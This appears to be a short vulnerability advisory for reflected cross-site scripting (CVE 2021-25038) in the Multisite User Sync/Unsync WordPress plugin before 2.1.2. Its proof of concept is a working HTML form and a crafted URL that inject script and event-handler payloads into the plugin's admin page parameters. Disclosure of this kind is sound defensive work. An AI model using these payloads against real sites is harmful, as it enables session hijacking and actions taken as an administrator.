Multisite User Sync/Unsync < 2.1.2 – Reflected Cross-Site Scripting | CVE 2021-25038

Description

The plugin does not sanitise and escape the wmus_source_blog and wmus_record_per_page parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/network/admin.php?page=wmus" method="POST">
      <input type="hidden" name="wmus_source_blog" value='1"><script>alert(/XSS-source_blog/)</script>' />
      <input type="hidden" name="wmus_record_per_page" value='10"><script>alert(/XSS-record/)</script>' />
      <input type="hidden" name="submit" value="Filter" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

https://example.com/wp-admin/network/admin.php?page=wmus&s=lxk1g%22+onfocus%3Dalert%281%29+autofocus%3D+xaycjmgr032&wmus_source_blog=1&wmus_record_per_page=12&wmus_sync_unsync=1&wmus_destination_blogs%5B0%5D=2&wmus_destination_blogs%5B1%5D=3&wmus_destination_blogs%5B2%5D=4&wmus_destination_blogs%5B3%5D=5&submit=Sync%2FUnsync